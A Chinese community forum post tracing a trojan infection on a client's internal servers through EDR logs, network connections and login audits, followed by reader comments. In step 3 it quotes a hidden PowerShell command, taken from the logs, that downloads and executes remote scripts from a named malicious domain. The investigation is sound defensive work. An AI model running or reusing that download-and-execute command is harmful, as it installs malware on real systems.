#原创分享#一次不成功的木马病毒溯源
  

青岛彭于晏 388312人觉得有帮助

{{ttag.title}}
一:项目背景
2021-3-19,客户反映内网服务器中木马,事情从服务器不能提供服务开始,随即发现多台服务器内存在木马病毒
二:客户诉求
中木马的时间以及中毒途径
三:溯源过程
1、从发现的第一台服务器(IP为222)着手开始调查,病毒已被杀毒软件隔离,查看病毒路径,首先查看文件夹写入时间(时间为此文件夹最后一次写的时间,文件夹内也没有别的文件)时间为3-16-11:11,基本可以确定中毒时间为3月16日11:11。
4733660573bed0529e.png
2、服务器安装了EDR软件,为什么没有作为,查看EDR的日志,吓一跳,病毒在运行时已被EDR检测,还被信任了,此时必有蹊跷,如果我没有记错的话,EDR文件实时防护检测的病毒可以忽略、隔离、信任,啥都不点应该是未处置。由此我推断这个操作是由远程桌面进行操作的,运行木马时点击信任。
1666560573cbc22768.png
3、查看浏览器以及下载软件是否有下载记录(答案是无),查看EDR的无文件攻击日志,巧妙的发现了执行了一些命令。具体看不懂,但是可以确定的是访问sec.xiaoshabi.nl了,猜测病毒是由这个网站传播。
powershell.exe  -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http://sec.xiaoshabi.nl:80/networks.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http://sec.xiaoshabi.nl:80/netstat.ps1')}"
405626057455a52d5c.png
4、whois一波,额并没有任何有用的信息,站长工具查询此域名也没有任何信息,只有一个A记录,而且IP是香港IP。
996046057473cb3c04.png
5、截止到目前未发现木马做了什么,一般面上看不出啥东西的木马,一定在后台隐藏着什么,知道了程序名查看下进程
,tasklist -v |find “msdtc”   然后根据查到的PID反查网络连接,程序去连接了一个IP地址.且状态为ESTABLISHED,IP可使用baidu查询,结果是个德国的IP,理论上讲客户并没有此类业务,该机器的状态很有可能被控制。
926786057495236e6c.png
5343160574966d8dcb.png

48286605749b26b74a.png

6、知道了病毒下载途径以及病毒连接的地址,去行为管理查日志,查询日志为3-16开始访问sec.xiaoshabi.nl的ip。查到了10+台,最早访问的IP是168,有些严重,先把网站封了再说,使用自定义URL和端口控制封堵对其访问,。
7、现在分析远程桌面,还是查日志,查远程桌面登录日志,筛选中毒前时间的登录日志,筛选结果为空。查看安全日志,发现中毒前有审核成功的日志,发现流程为222<20<168,168是最早下载木马的机器,与AC日志吻合,再查168的日志,远程桌面日志也没有,登录审核日志也没有了,截止到现在已经无路可查了。
8、168机器还发现有趣的问题,EDR不知被何人在2021年1月13日设置了全盘信任,相关日志也没有。有可能是被故意删除了。其次发现一计划任务,每隔5分钟会执行一次powershell,本次的访问的域名为pastebin.com,解析地址为么美国,确认无相关此业务。
2119260574e75d2cea.png
6818060574ef7b3344.png
9、查找相关计划任务,直接删除。
702860574f9ea04e6.png

溯源到此结束,有可能有分析不对的地方,见谅,知识库储备中。。。

打赏鼓励作者,期待更多好文!

打赏
73人已打赏

飞翔的苹果 发表于 2021-3-22 10:00
  
感谢分享,学习学习
新手666733 发表于 2021-3-24 07:56
  
恶意powershell脚本内容需要再具体分析
ie5000 发表于 2021-3-24 09:03
  
感谢楼主分享,学习学习
新手053123 发表于 2021-3-24 09:50
  
很详细的分析和说明资料
Yxhong 发表于 2021-3-24 10:02
  
分析思路很清晰,分析过程有条理性
易逝的信仰 发表于 2021-3-24 10:16
  
发帖辛苦,感谢分享~
一条软白鲨 发表于 2021-3-24 13:36
  
分析思路很清晰,分析过程有条理性
wdxy0111 发表于 2021-3-24 17:16
  
感谢分享,又学到了一招
新手394045 发表于 2021-3-25 08:35
  
果然是高手在民间,楼主帖子写的不错,很有参考价值,还想看更多精彩分享,期待楼主下一篇好帖!
发表新帖
热门标签
全部标签>
信服课堂视频
每日一问
GIF动图学习
技术笔记
产品连连看
在线直播
安装部署配置
项目案例
新版本体验
功能体验
专家分享
技术咨询
SDP百科
技术圆桌
答题自测
原创分享
畅聊IT
每日一记
云计算知识
SANGFOR资讯
标准化排查
专家问答
运维工具
排障笔记本
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
用户认证
解决方案
sangfor周刊
VPN 对接
技术顾问
信服故事
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
加速技术
产品预警公告

本版版主

203
120
129

发帖

粉丝

关注

本版达人

新手61940...

本周建议达人

二进制网络

本周分享达人